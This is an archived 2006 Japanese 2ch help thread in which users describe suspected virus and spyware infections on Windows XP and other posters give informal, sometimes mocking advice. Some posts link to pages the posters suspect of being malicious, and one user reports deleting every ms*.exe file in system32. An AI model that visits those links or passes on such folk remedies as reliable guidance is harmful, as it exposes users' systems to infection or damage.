【何をしたらそんなことになったのか】 クッキー許可の企業サイトにログインして
【これまでにとった措置】 スパイウェア削除ソフトで削除(今は検出してない)

273 :名無しさん@お腹いっぱい。:2006/06/03(土) 05:08:09
色んなスレがあってどこで質問すれば良いのか迷っていましたが、とりあえず
ここで質問させてもらいます。

【使用OS】 WinXP SP2(Home
【WindowsUpdateしてるか】 Yes
【AntiVirusは何を使っているか】 @niftyセキュリティ24
【ちゃんとUpdateしてるか】 Yes
【スキャンした結果(ウイルス名・発見場所)】 未検出(スパイウェアスキャンではどれがError Safeの物か判りませんでしたが十何件か検出)
【別のオンラインスキャンしたならその結果は】 未検出
【症状を具体的に、分かる限りすべて書く】 某掲示板からのリンクを踏んでError Safeというソフト騙されて実行してしまいました。
【何をしたらそんなことになったのか】 セキュリティ24の仕様で、ONにしてる間は串を通した状態になってしまうので、その掲示板に書き込むためにOFFにしていた事が原因かと思われます。
【これまでにとった措置】 とりあえず、セキュリティ24のウィルスチェック(ウィルスバスターオンラインスキャン使用)と、更に「悪意のあるソフト削除ツール」他幾つかのスキャンツールを使いスキャンしましたがどれも未検出でした。
先に述べたようにスパイウェアをスキャンしたところ、判別はつかなかったものの一通り削除。
次に、「プログラムの追加と削除」を使い通常通りError Safeをアンインストールしました。
【その他の質問】これで、しっかり削除されているはずなのですが、心配なのでここで質問することにしました。
ご指摘、返答お待ちしております。

274 :名無しさん@お腹いっぱい。:2006/06/03(土) 11:58:16
>>267
答えるだけの知識や技術を持ち合わせていないのです。
すみません。
何か分かりましたら教えてください。

275 :名無しさん@お腹いっぱい。:2006/06/03(土) 12:12:57
>>270
VBA32のヒューリスティックでBackdoor.Delf.13
という反応が出ます。
危険の可能性があります。

276 :名無しさん@お腹いっぱい。:2006/06/03(土) 12:30:13
VBA32でしかかからないとは・・・

277 :名無しさん@お腹いっぱい。:2006/06/03(土) 14:54:40
>>274
ダウソとセキュ板の区別も付かない奴は氏ね

278 :名無しさん@お腹いっぱい。:2006/06/03(土) 14:57:06
>>277
答えないのではなく、答えられないバカ乙。


279 :名無しさん@お腹いっぱい。:2006/06/03(土) 15:02:08
>>277
知ってれば教えるけど、分からないから教えられない。
不用意に出所不明のexeを実行しないのが基本ではあるが。


280 :名無しさん@お腹いっぱい。:2006/06/03(土) 15:04:38
>>275
ほんとだな
シマンテックに報告しといた

281 :名無しさん@お腹いっぱい。:2006/06/03(土) 18:01:16
>>275-276
ありがとうございます

Vdownloader.exe、実行してしまった_| ̄|○

282 :名無しさん@お腹いっぱい。:2006/06/03(土) 18:32:51
【使用OS】 winxp sp2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ノートンインターネットセキュリティ
【ちゃんとUpdateしてるか】してます
【スキャンした結果(ウイルス名・発見場所)】なし
【別のオンラインスキャンしたならその結果は】spybotも反応無し
【症状を具体的に、分かる限りすべて書く】
1ヶ月程前から、15分置きにタスクバー上に何かがポップアップします。
アイコンは真っ白で、1秒程タスクバー上に現れすぐに消え
また15分後ぴったりに現れます。一瞬フリーズするような感じです。
今までは気にしてなかったのですが、オンラインゲームを始めたところ
フルスクリーンだとそれがポップする度に落とされてしまうのでどうにか駆除したいです。
スパイウェアの類かと思ったのですが、スキャンでも反応しなく困ってます。
【何をしたらそんなことになったのか】 原因不明です。p2pは以前やってましたが
現在はアンインスコ済みです
【これまでにとった措置】ノートン先生、spybotによる完全スキャン

有識者の方、ご助言よろしくお願いします。


283 :名無しさん@お腹いっぱい。:2006/06/03(土) 18:44:27
マカフィーのお試し使用期間が切れるんですけど、
継続しないとウィルスやばいですか?
他のウィルス対策ソフトは何も使ってません。
ライムワイヤー使ってます。


284 :名無しさん@お腹いっぱい。:2006/06/03(土) 18:44:58
ペスパトでスキャンしてみれば?
http://www3.ca.com/securityadvisor/pestscan/

285 :名無しさん@お腹いっぱい。:2006/06/03(土) 19:52:28
>>284
これは何ですか?


286 :名無しさん@お腹いっぱい。:2006/06/03(土) 20:08:57
>>285
PestPatrolでぐぐってみれ

287 :名無しさん@お腹いっぱい。:2006/06/03(土) 21:11:34
>>281
オレも実行してしまった…orz

DOS画面と思われる小窓出てたし、URL入れてもavi/mpgに変換されない。
「やっちまったー…」と思いつつ、トレンドマイクロに報告しといた…。

ところで、Backdoor.Delf.13って、山田オルタナティブ系?
ぐぐったけど良く分からん。

288 :名無しさん@お腹いっぱい。:2006/06/03(土) 21:24:13
>>287
ttp://www.viruslistjp.com/viruses/encyclopedia/?virusid=56564
この辺の亜種じゃねーかな?

289 :282:2006/06/03(土) 21:53:34
上に出てたペスパトというソフトでスキャンしてみたところ
CnsMinとJWord Pluginが検出されたのですが
調べてみたところこれとはあまり関係は無さそうです
私と似た症状が起こったことのある方おりませんでしょうか?

290 :名無しさん@お腹いっぱい。:2006/06/03(土) 21:59:40
>>289
msconfigで常駐してるものを順に切っていって原因調べてみたら?

291 :名無しさん@お腹いっぱい。:2006/06/03(土) 22:06:03
メールソフトを起動すると その起動した時間で受信のウイルスメールを
3件ほど受信することが 多いのだが   なぜ??

292 :名無しさん@お腹いっぱい。:2006/06/03(土) 22:33:53
すいません>>283お願いします。


293 :名無しさん@お腹いっぱい。:2006/06/03(土) 22:36:04
>>292
やばい

294 :名無しさん@お腹いっぱい。:2006/06/03(土) 22:37:44
>>292
マカフィーを継続しても良いし、フリーのアンチウイルスでも
良いから最新版使ったほうがいいよ。


295 :名無しさん@お腹いっぱい。:2006/06/03(土) 22:54:36
>>293
>>294
レスありがとう!
お金ないからなるべく買いたくなかったけどやっぱりやばいかぁ・・
詳しくないからそのままマカフィー継続しようと思います。どうも。


296 :名無しさん@お腹いっぱい。:2006/06/04(日) 00:41:37
>>287
トレンドマイクロに通報って普通にメールで
「これウイルスっぽいから検査お願い」って出したの?

俺もノートンに送ろうと思ってるんだが、普通にメールでこのソフトのURLと
VBA32でウイルス反応出るって書いて送ればいいのかな?

297 :名無しさん@お腹いっぱい。:2006/06/04(日) 04:11:52
>>296
NortonAntivirusのレポート→検疫項目欄に提出って項目があるからそこから送れる
ちなみに今回のはもう送ってる

298 :297:2006/06/04(日) 04:49:28
おおっと[CLOSING]きてたわ
ウイルスじゃないみたいだが先生は使うな言うとる

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: D:\vdownloader\VDownloader021\VDownloader.exe
コンピュータ: YOUR-1225E243B5
結果: デベロッパーノートを参照してください。
デベロッパーノート :
D:\vdownloader\VDownloader021\VDownloader.exe is clean and not malicious.


このファイルは悪質なものではありませんが、あなたのコンピュータ上で知らないうちに動作しています。
このファイルを削除することをお勧めします。


299 :名無しさん@お腹いっぱい。:2006/06/04(日) 05:00:00
>>296
つttp://subwiz.trendmicro.com/SubWiz/Wizard.asp?opgWizard=7
F-Secureにも送るか

300 :名無しさん@お腹いっぱい。:2006/06/04(日) 05:29:34
今使ってるバスターでは何も検出されなかったけど
ノートンのオンラインスキャンしたら
2chDoeViewのログdatからたくさん検出されおった。
これ、誤動作記述があるってだけですよね?

301 :名無しさん@お腹いっぱい。:2006/06/04(日) 11:44:26
>>296
そう。ウィルス通報フォームがあるから、落とした圧縮ファイル添付して
ほぼ>>275の内容コピペみたいな感じで送ってみた。

山田・キンタマ系だとすると、winny使ってないから
暴露されようがないのかなぁ、と一瞬思った。どうなんだろ。

302 :名無しさん@お腹いっぱい。:2006/06/04(日) 12:18:46
山田はHDDをサーバーにする

303 :270、281、296:2006/06/04(日) 21:52:41
>>297
>>299
>>301

正直すまんかった
作者にメールして聞いてみたんだが、
VBA32のHeuristcs(Pranaoid mode)でやった時の誤検出だとさ。
作者もVBAにメールで報告したらしい。

ちなみに作者はスペインの大学の教授です。
で、その大学のブログでそのソフト公開してます。
この大学。
Universidad Europea de Madrid
p://www.uem.es/

詳細はここ見てください
http://pc7.2ch.net/test/read.cgi/streaming/1149218381/

304 :297:2006/06/04(日) 23:48:53
専用スレたってたんか
とりあえず>>303

305 :名無しさん@お腹いっぱい。:2006/06/05(月) 09:04:20
>>300
たぶんそう

306 :名無しさん@お腹いっぱい。:2006/06/05(月) 13:38:54
OS XPSP2
使用PCイーマ3020
PCネット環境無し
            再起動するとシステム32内のms〇〇.exeがかってに起動してCPU使用率を百パーにしてしまいます
削除して再起動してみるとこんどは違うms〇〇.exeが起動してCPU使用率を百パーにしてしまいます
これの繰り返しです
(〇〇に入る文字はそのつど違う)
こんなウィルスあるかごぞんじですか?
対策ごぞんじでしたら教えてください            
・うえに書いた通りにいまネット環境ないのでウィルス定義が最新ではありませんが
ウィルスチェックしてもウィルスは見つかりませんでした
・スパイウェアも同様に見つかりませんでした
・システムの復元してみても無駄でした


307 :名無しさん@お腹いっぱい。:2006/06/05(月) 13:58:03
>>306
以前はネットにつないでたの?
何か怪しいファイルを実行したのでは?
ネットにつないでまずはオンラインスキャンでもやってみたら?

308 :名無しさん@お腹いっぱい。:2006/06/05(月) 14:19:51
うん、半年前まではネットつないでいたけれど
上に書いた症状がでたのは昨日なんです
特になんかいつもやってる事以外を実行したわけじゃないので時限式のウィルスかな?と思ってここで聞いてみたのです
            で、もうめんどくさいからダメ元でシステム32のなかのMS〜で始まるexeを全部削除したら解決しちゃつたかもしれないw
このせいで不具合でるかもしれないけどとりあえず様子見てみます


309 :名無しさん@お腹いっぱい。:2006/06/05(月) 17:25:21
age

310 :名無しさん@お腹いっぱい。:2006/06/05(月) 22:28:27
超PC初心者です。
非常に困っています、皆様のお力添えをお願いしたく

【使用OS】 XP
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】 ウイルスバスター コーポレートエディション
【ちゃんとUpdateしてるか】 していない
【スキャンした結果(ウイルス名・発見場所)】
・Temporary Innternet Files HTML MHTREDIRA
・Windous System32 トロイ
・Program Failes トロイ
・他
【別のオンラインスキャンしたならその結果は】していない
【症状を具体的に、分かる限りすべて書く】 メールいっぱい受信する
【何をしたらそんなことになったのか】 エロサイト(恥ずかしいです)
【これまでにとった措置】 Temporary Innternet Files 削除
【その他の質問】

311 :名無しさん@お腹いっぱい。:2006/06/05(月) 23:30:38
再インスコ

312 :名無しさん@お腹いっぱい。:2006/06/06(火) 01:09:14
ありがとうございます。実は会社のPCなので簡単に再インストールする事が出来ません。それ以外の方法はないでしょうか??


313 :名無しさん@お腹いっぱい。:2006/06/06(火) 01:31:55
>【WindowsUpdateしてるか】 していない
>【ちゃんとUpdateしてるか】 していない
>【スキャンした結果(ウイルス名・発見場所)】
>・Temporary Innternet Files HTML MHTREDIRA
>・Windous System32 トロイ
>・Program Failes トロイ
>・他
Updateもしてないし、ウイルスがわんさか入ってるような状態じゃ
リカバリするしかないんじゃない?

314 :名無しさん@お腹いっぱい。:2006/06/06(火) 01:53:04
age

315 :名無しさん@お腹いっぱい。:2006/06/06(火) 07:42:06
ヤッパリ駄目ですか?ウイルス感染した時はシステムやプログラムにトロイが入ってたんですが、今はバスターしてもシステム32しかHitしません。システム32の削除及び復旧の仕方はどうするんでしょうか?意味無いでしょうか?足掻いてスミマセン。教えて下さい。

316 :名無しさん@お腹いっぱい。:2006/06/06(火) 07:49:12
>>315
>>310

情報が少なすぎるし、スパイウェアにもやられてる悪寒
リカバリ決定
リカバリ後はすぐにアップデートするように

317 :名無しさん@お腹いっぱい。:2006/06/06(火) 07:58:25
ウイルスはHTML MHTREDIRAって奴だけだったの?
略してトロイって呼んでるなら論外だぞ

318 :名無しさん@お腹いっぱい。:2006/06/06(火) 08:06:50
316 317 有難うございます ウイルスはHTMLとTROJシリーズでした。

319 :名無しさん@お腹いっぱい。:2006/06/06(火) 08:36:03
WindowsUpdateもしてない、アンチウイルスソフトのupdateもしてない、
これじゃあトロイはやりたい放題だな

現状で何されてるかわからんのだから
被害拡大しないうちにそのマシンの回線切って
さっさと再インスコしろ
会社のPCなら管理者に相談するんだな

320 :名無しさん@お腹いっぱい。:2006/06/06(火) 09:05:39
TROJシリーズ???
性格に書いてよw

321 :名無しさん@お腹いっぱい。:2006/06/06(火) 09:20:18
管理者も大変だな。

322 :名無しさん@お腹いっぱい。:2006/06/06(火) 16:40:39
>>310

管理がずさんだと当然リスクが高くなっちゃいますよ
必要なデータファイル等をバックアップしてからリカバリですね
最低限OFFLINEでのSP2適用が必要です

323 :名無しさん@お腹いっぱい。:2006/06/06(火) 21:06:12
>>310
やれるだけ駆除してみたら?
まずはオンラインスキャンか、最新状態にバスターをUpdateしてスキャン。
何というウイルス、トロイなのかを特定する。
あとはレジストリとか修復して、アンチスパイそふとでスキャン。
基本をやっていくしか。

324 :名無しさん@お腹いっぱい。:2006/06/06(火) 21:10:37
>>310
ttp://www13.plala.or.jp/sukiero/erostart/
ttp://www.higaitaisaku.com/removewz01.html



325 : ◆N9P3SuvBPo :2006/06/06(火) 22:27:52
>310
OSはXPだな。
WindowsUpdateやってない、ウイルスバスターは入れてあるが、
定義ファイルの更新はやっていない。
あと、
>【症状を具体的に、分かる限りすべて書く】 メールいっぱい受信する
症状はこれだけじゃなくて、まだ他にもあるんだろ。
エロサイトのポップアップ広告がしつこく開く。とか、IEのスタートページが
変更されて戻せないとか、変な英語の警告文が、タスクバーから表示されたままになってる
とか、ブラウザに見覚えの無いツールバーが表示され、かつそれが消せないとか、他色々。

結論、リカバリ推奨。

326 :名無しさん@お腹いっぱい。:2006/06/06(火) 22:46:26

Script.RedLof.HeadVirs

てなんでしょうか?ググってもトレンドマイクロで検索してもそれっぽい
ものが見当たりません。
とあるサイトで感染してました報告があったので・・・
ウィルスバスター入れていてウィルス検索しても何も出てこないのですが

どなたか分かる方お願いします。

327 :名無しさん@お腹いっぱい。:2006/06/06(火) 22:57:51
普通にRedLofでググレよw

328 : ◆N9P3SuvBPo :2006/06/06(火) 23:00:31
>VBS_REDLOF.A

ってすでに撲滅したんじゃなかったけ?

329 :326:2006/06/06(火) 23:41:06
ググってきました!

kernel32ってファイルがあったら削除しろ的なことが書いてあったので
システムを検索したらありました。
で、トレンドマイクロで削除手順があったので見てみたら自動削除ツールが
DLできたので、早速試してみたのですが何も発見されませんでした。
これってどういうことですかね?
じゃあ、上記のファイルはなんなんだと。

330 :質問です:2006/06/07(水) 01:11:32
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 わかりません
【AntiVirusは何を使っているか】 のーとん?ってことですか?
【ちゃんとUpdateしてるか】 しますた
【スキャンした結果(ウイルス名・発見場所)】 発見されませんでした
【別のオンラインスキャンしたならその結果は】 しようとしましたが、おとせませんですた
【症状を具体的に、分かる限りすべて書く】 やけに重く、コマンドプロンプト見たら、
韓国あたりの悪質IP(?)に、勝手に接続しようとしてました
【何をしたらそんなことになったのか】 わかりませんが、スレ開いたら、
のーとん先生に激怒されました
【これまでにとった措置】 なにをすればいいのかわからないので
まだしていません。
とりあえずネット遮断したくらいです
【その他の質問】 ウィルスバスターというソフトを買えば
どうにかなるのでしょか?

どなたか教えていただけないでしょか?

331 :名無しさん@お腹いっぱい。:2006/06/07(水) 02:07:19
【使用OS】WinXP
【WindowsUpdateしてるか】自動更新しています
【AntiVirusは何を使っているか】Norton Internet Security 2005
【ちゃんとUpdateしてるか】自動更新しています

【スキャンした結果(ウイルス名・発見場所)】
 ウイルスが発見されませんでした…。
【別のオンラインスキャンしたならその結果は】
 ウイルスバスターオンラインスキャンと、
 Micrsoftのサイトにあった悪意あるツールの有無をチェックするもの
 どちらも異常なしとの結果でした。
【症状を具体的に、分かる限りすべて書く】
 いずれも今週の月曜日からの症状です。
・状態エラー204→シャットダウン
・メールの大量配信(メーラーは経由していない模様)
・侵入検知のログを見ると大量にPortScanが発生していました。

【何をしたらそんなことになったのか】
 ウイルススキャンが途中でフリーズ→再起動→発症

【これまでにとった措置】
 メールの大量配信を止めるため、
 Nortonのファイアーウォールでポート25を閉じています。

【その他の質問】
 いかにもウイルスらしき行動なのに、
 2日がかりで調べてもウイルスが検出されず、
 対処のしようがない状態で困っています。
 どうぞお力を貸していただけないでしょうか。


332 :名無しさん@お腹いっぱい。:2006/06/07(水) 04:44:53
>>331
1.reg
2.リカバリ

333 :名無しさん@お腹いっぱい。:2006/06/07(水) 05:36:18
>>329
どう読んだのかは知らないけど・・・
それになりすましてるのが危険であって kernel32自体は別にあって問題ない。
つまりは感染してなかったってだけでしょ。
つかテンプレに沿って質問しないとそっちの環境が解らないんで、
間違った解答とか無駄なやり取りのレスが続くんでちゃんとテンプレ使って。

334 :名無しさん@お腹いっぱい。:2006/06/07(水) 13:13:07
age

335 :名無しさん@お腹いっぱい。:2006/06/07(水) 16:23:35
http://www.google.co.jp/search?hl=ja&q=%E9%9D%92%E6%9C%A8%E9%9A%86%E8%A1%8C&lr=

ウイルスになってみたいのですがどうですか。どうせ誰もウイルスにする知識も無いからあきらめます。

336 :名無しさん@お腹いっぱい。:2006/06/07(水) 16:26:15
ウイルスにはなれないだろw

337 :名無しさん@お腹いっぱい。:2006/06/07(水) 17:06:07
ギコナビ バタ51でニュー速の
橋本元首相病状続報】緊急手術で腸摘出、人工肛門取り付ける...(1149601.dat)
を開こうとしたらトロイ(Exploit-MhtRedir.gen)
を検知されちゃったんだけどどうゆうこと?
AntiVirusはマカフィーvirus scan ver8.0です

338 :名無しさん@お腹いっぱい。:2006/06/07(水) 17:28:12
まぁ誤検出だろうけど
マカフィースレで聞いた方がいいんでない

339 :名無しさん@お腹いっぱい。:2006/06/07(水) 18:21:07
>>337
発見しただけなら構わないんじゃないの
どうせ脆弱性がなければそんなスクリプトで感染しないんだから

340 :330:2006/06/07(水) 19:45:20
スルーされてしまうのはなにゆえですの?

341 :名無しさん@お腹いっぱい。:2006/06/07(水) 20:02:34
面白くないから

342 :330:2006/06/07(水) 20:32:46
おもしろくなくていいです
深刻っぽいのです

343 :名無しさん@お腹いっぱい。:2006/06/07(水) 21:00:07
自分で何1つ把握できてないし再インストールした方が早い

344 :330:2006/06/07(水) 21:12:40
把握できてたら、質問しないのです。
何を再インストールです?

345 :名無しさん@お腹いっぱい。:2006/06/07(水) 21:14:13
PC買い換えると全て初期状態でクリーンな環境でつよw

346 :名無しさん@お腹いっぱい。:2006/06/07(水) 21:18:03
>>338
>>339
サンクス
マカフィースレで聞いてみます

347 :名無しさん@お腹いっぱい。:2006/06/07(水) 21:25:42
釣り板の

【釣成果】外道の【外道だからといって捨てるな】

と、言うスレがいつも2つしかレスが無いんで、どうしたんだろう?と思って見てみたら
、何やらアルファベットがたくさん書いてあって、セキュリティが動き出し感染しました。
あれはいったい何?あんなのあるの?詳しい方教えてください!!

348 :名無しさん@お腹いっぱい。:2006/06/07(水) 21:29:51
>>344
いい加減消えろ

349 :( ゚∀゚)<プップー:2006/06/07(水) 21:39:19
>>348
( ゚∀゚)<プップー
きれてるの?( ゚∀゚)<プップー

350 :名無しさん@お腹いっぱい。:2006/06/08(木) 01:17:23
マイドキュメントに保存した、ファイル名に"pass"とか"password"とかついているファイルが
C:\Documents and Settings\ユーザー名 の中に勝手にコピーされているのを発見しました。
あと、そこに"Administrator"とは別に"Administrator-コンピュータ名"というユーザー名が
勝手に出来ていました。
なんだか気味が悪いです。これがトロイの木馬というものなのでしょうか?


351 :1/2:2006/06/08(木) 02:03:46
【使用OS】XPSP2
【WindowsUpdateしてるか】 している
  特に今日特に重要ではないUPDATEをまとめて6個ほど行った
  直後の再起動時、StartupScannerでOSのサービスが
  30個ほど削られていて、再スキャンしたら
  30個ほどのサービスが追加されていました。
【AntiVirusは何を使っているか】 マカフィー
【ちゃんとUpdateしてるか】 自動(ほぼ1日に1回アップデートされている)
【スキャンした結果(ウイルス名・発見場所)】 見つからない
【別のオンラインスキャンしたならその結果は】 ウイルスバスター:見つかりませんでした。
【症状を具体的に、分かる限りすべて書く】
 DonutおよびDonut_L(というタブブラウザー)を起動中または
 起動しようとすると、マカフィーのウイルススキャン機能がOFFになります。
 ONにしてもすぐOFFになります。
 また http://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3425.gif という
(『タイムアウト期間内に、指定した\Device\HardDisk1\DR4でのI/O操作が完了しませんでした。』)
 メッセージが頻繁に出ます。


352 :2/2:2006/06/08(木) 02:05:46
【何をしたらそんなことになったのか】
 直前に見たサイト
 tp://yu-net.info/swfup/viewswf.php/3651.swf (フラッシュ)
(雑談系板で張られていて、他に症状を訴える人は無し)
 その少し前に見たサイト
 tp://www.jah.ne.jp/~kako/
 tp://www.jah.ne.jp/~kako/frame_dwm_search.html
 tp://www.generic.gr.jp/index_sr.php
 tp://health.yahoo.co.jp/medicine/
【これまでにとった措置】
 Donutを終了させ(タスクマネージャーから強制終了)マカフィーのウイルススキャンをONにして
 Donutを起動し、再現することを確認。
 Donut_Lで再現することを確認、IEでは再現しないことを確認。
 Windowsのファイアウォールを見て(ここは普段あまり見ないのですが)
 印象として[Windows Media Connect]が6個、例外指定されているのが
 以前と違うと思いました。
 ウイルスバスターのオンラインスキャン中にマカフィーがトロイの木馬を検出しました。
 http://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3427.gif
 http://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3428.gif
【その他の質問】
1) オンラインスキャン中に(Webサイトは見ていない状態)トロイを検出したということは
  バックドア(!?)なるものが形成されてしまっているのでしょうか?
その対処は?
2)ファイアウォールの[Windows Media Connect]の例外指定は外したほうがよいでしょうか。

353 :351:2006/06/08(木) 02:45:17

windowsアップデート(重要な項目は直ぐアップデートしてたので)
今日は緊急性の低いものをまとめてアップデートしました。
そのときのStartupScannerというソフトで検出した起動時プログラム/サービスの
図です。
起動直後のスキャン結果
ttp://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3430.gif
ttp://erotyabin.gotdns.com/user/erotyabin/cgi/uproda/img/upsf002851.gif
再スキャンしてみた
http://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3431.gif
http://erotyabin.gotdns.com/user/erotyabin/cgi/uproda/img/upsf002852.gif

354 :名無しさん@お腹いっぱい。:2006/06/08(木) 02:51:15
質問です。
とあるエッチサイトを見ていたら
いつのまにか「Nclean」というフォルダが
プログラムファイル内に出来ており(勝手にダウンロードされた?)
フォルダ内に「Ncclean.exe」や「POPNclean.exe」
というファイルなどが作られていたほか、たまに
勝手に何かのデータをアップデートしようと
デスクトップ上で機動してしまいます(そのたびにLANを
引き抜いています)。ウイルスバスターを常にアップロードしており
ウイルス検索でも特に反応は無かったのですが
削除も出来ず、困っています。
どなたか教えて頂けませんでしょうか。


355 :名無しさん@お腹いっぱい。:2006/06/08(木) 09:06:24
>>354
パソコン初心者@2ch掲示板
http://pc7.2ch.net/pcqa/
エロサイトを見たら…助けてください!Part61
http://pc7.2ch.net/test/read.cgi/pcqa/1141370819/

356 :351:2006/06/08(木) 14:01:31
ad-awreでスキャンを行ったら 「なまえ@adserver[1].txt」というクッキーが
クリティカルとしてヒットした。(なまえ:アカウント名)
中身はこんな感じでした。
「rsi_us_1000000

pUMF5k+g/xMULsQQ3nSG7ZIqtFc6dBco

中略  

wSw34TFERQi

ads.revsci.net/adserver

1024

3273187072

32138368

2878408112

29788753

*」
これをad-awareで対処したあとはDonut,Donut_L共に正常動作してるようです。
で、>>351-352はどうでしょう?

357 :名無しさん@お腹いっぱい。:2006/06/08(木) 16:30:13
age

358 :名無しさん@お腹いっぱい。:2006/06/08(木) 20:57:57
トリップを漏らすようなウイルスってありますか?
もしくはトロイ等に感染するとトリップ漏れするような事はありえるのでしょうか?

359 :名無しさん@お腹いっぱい。:2006/06/08(木) 21:40:53
トリップだけ狙うようなのは聞かないが
トロイの木馬にかかればすべて筒抜けなので
もれても別に不思議なことではない

てかなんでそんな心配するんだ?

360 :名無しさん@お腹いっぱい。:2006/06/08(木) 21:53:19
専ブラの書き込みログを放流するトロイがあるので有り得なくは無い
専ブラによっては名前欄に何を書き込んだかログ内に保存しているものもある

361 :名無しさん@お腹いっぱい。:2006/06/08(木) 22:49:43
あとはデスクトップのSS晒すタイプとか

362 :名無しさん@お腹いっぱい。:2006/06/09(金) 12:36:19
age

363 :名無しさん@お腹いっぱい。:2006/06/09(金) 16:12:55
age

364 :名無しさん@お腹いっぱい。:2006/06/09(金) 16:51:12

ハゲ

365 :名無しさん@お腹いっぱい。:2006/06/09(金) 18:11:14
なんだと(怒

366 :名無しさん@お腹いっぱい。:2006/06/09(金) 23:09:36
ホケ

367 :351:2006/06/10(土) 15:50:26
>>352
【その他の質問】
1) オンラインスキャン中に(Webサイトは見ていない状態)トロイを検出したということは
  バックドア(!?)なるものが形成されてしまっているのでしょうか?
その対処は?
2)ファイアウォールの[Windows Media Connect]の例外指定は外したほうがよいでしょうか。

だけでもおしえてもらえないでしょうか?

368 :名無しさん@お腹いっぱい。:2006/06/10(土) 16:34:11
>>367
そんなもん作られてないでしょ。
スキャンの時にその感染したファイルにアクセスしたから反応しただけでは?
それよりその検出したファイルは削除したんだよね?

てか>>351-353で無駄な事書きすぎ・・・w

369 :名無しさん@お腹いっぱい。:2006/06/10(土) 17:18:18
まあいわれてから情報小出しにするやつよりはなんぼかマシだろ

370 :やけ:2006/06/10(土) 18:28:05
【使用OS】 Windows XP
【WindowsUpdateしてるか】
SP1使ってます。updateの.exeもウィルスに感染したらしくここ1ヶ月のUpdateは出来てません
【AntiVirusは何を使っているか】
ウィルスバスター2004
【ちゃんとUpdateしてるか】
今年春にしました
【スキャンした結果(ウイルス名・発見場所)】
PE_PARITE.A-1とPE_PARITE.A
PE_PARITE.A-1はlocal settingsの中のTEMPに。
PE_PARITE.Aはほとんどのexe等に感染…
【症状を具体的に、分かる限りすべて書く】
PARITE.A-1のほうは2〜3個ほどしか感染していませんが、PARITE.Aはかなり感染が広がってる模様です・・色々なサイトで調べたのですが、PARITE.A-1のほうがウィルスバスターで駆除できませんと表示され、手動で削除しようとすると
アクセスできません。ファイルが使用中でないか確認してください
とでます。セーフモードなら削除できますが、通常のWindowにもどすと、再びウィルスファイルがあったり・・
【これまでにとった措置】
ウィルスバスターで検索、トレンドマイクロのHPにあるデータベースにのっていた措置
【その他の質問】
レジストリでキーの削除、セーフモードでのウィルスファイルの削除等やっていますが、無理でした・・

371 :名無しさん@お腹いっぱい。:2006/06/10(土) 18:39:54
>>104 >>107
このサイト踏んでしまったが
avastでワーム検出のアラートでたぞ


372 :名無しさん@お腹いっぱい。:2006/06/10(土) 18:44:52
>>370
うむ、手遅れだな
OSの再インストールを勧めよう

再インストール後はルータかますか、なんかファイアウォール入れた状態で
真っ先にWindowsUpdateへGo
それからアンチウイルスソフトのパターンが今年春なんてのは
ソフトつかってないのと大差ないぞ

373 :名無しさん@お腹いっぱい。:2006/06/10(土) 19:14:07
SP1のサポート終わるのか

374 :351:2006/06/10(土) 21:56:34
>>367
>スキャンの時にその感染したファイルにアクセスしたから
ウイルスバスターのオンラインスキャンを実施中に
マカフィーが反応したのです。
>それよりその検出したファイルは削除したんだよね?
 http://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3428.gif
この文面ではマカフィーが削除したと言ってますね。(ソフトの日本語って信用できないですが)
このばあい私は何もしていません。

375 :351:2006/06/10(土) 21:57:27
 http://xxxxx.dyndns.tv/~nadesiko/up/img/upupup3427.gif
どっちの文がただしいのやら・・・

376 :名無しさん@お腹いっぱい。:2006/06/10(土) 22:19:42
>>374
いや、だからオンラインスキャンでスキャンするってことは
そのファイルにアクセス(表現は違うかもしれない)してんだからそれがウイルスなら反応するって。
僕もeTrustでオンラインスキャンすると反応するなーそういや

削除されててもう出てこないならその件に関しては問題ないでしょ

377 :351:2006/06/11(日) 00:49:49
>>376
だったら、ウイルスバスターのオンラインスキャンの方でも反応してもよさそうなのに。
まぁそうゆうもんなのかな、どうもお付き合いありがとうございます。

P.S
マカフィーの出すメッセージは先に「削除しました」とかいておきながら、あとのメッセージで「削除が必要です」って、わけがわからなくなります。
windowsで悪例ができてからソフト製品の日本語むちゃくちゃ。(企業はUIにコストかけないね)

378 :名無しさん@お腹いっぱい。:2006/06/11(日) 09:52:55
質問です!!
最近googleの調子がおかしいのです。。。
検索結果から(例えばad awareと検索)そのページに飛ぼうとすると、
↓のような意味のわからないサイトに飛んでしまう事があります。
ttp://up-search.com/ad%20aware.cfm?nft=1&t=7&p=4
何回か飛びなおしをすれば目的のサイトにたどり着くのですが・・・
これは何かのウィルス、もしくはスパイウェアの仕業なのでしょうか??

セーフモードで起動&Ad awareで検索⇒削除、としたのですが直りませんでした・・・。
何か情報がありましたら教えてくださいm( __ __ )m

379 :名無しさん@お腹いっぱい。:2006/06/11(日) 10:06:51
ブラウザハイジャカーかなー
HijackThisでも使って見てみれば?

380 :名無しさん@お腹いっぱい。:2006/06/11(日) 10:41:11
>>370
親玉インストーラーファイルを検出されないように上手くやられているのさ
こいつを最初に削除しないと起動の度に感染させられる
発見方法は自動実行になっているサービスやプロセスを全部Spybot - Search & Destroyなどで自分で調べ上げればわかるでしょう
これはスキャンしたって引っかからないからな

381 :名無しさん@お腹いっぱい。:2006/06/11(日) 16:42:21
CDイメージファイル(iso、bin、ccdなど)をスキャンできるウィルスソフトを教えてください

382 :名無しさん@お腹いっぱい。:2006/06/11(日) 17:09:27
スキャンするイメージファイルの名前と入手経路をまず書いてください

383 :名無しさん@お腹いっぱい。:2006/06/11(日) 17:27:13
ゲラゲラ

384 :名無しさん@お腹いっぱい。:2006/06/11(日) 17:52:31
今携帯のみのためテンプレ通りでなくすません

OS WIN2000
アップデート 自動でしている
ウイルスソフト ウイルスバスター2006
アップデート 自動でしている
オンラインスキャン 通信不可のため未実施
症状 C:\WINNT\SYSTEM32\rofl.sysがウイルスとして検出される、通信出来ない
実施項目 rofl.sysでぐぐり、トレンドマイクロのページに従いレジストリ変更、再立ち上げ実施、
質問 rofl.sysが削除出来ません。方法を教えて下さい。

385 :あぼーん:あぼーん
あぼーん

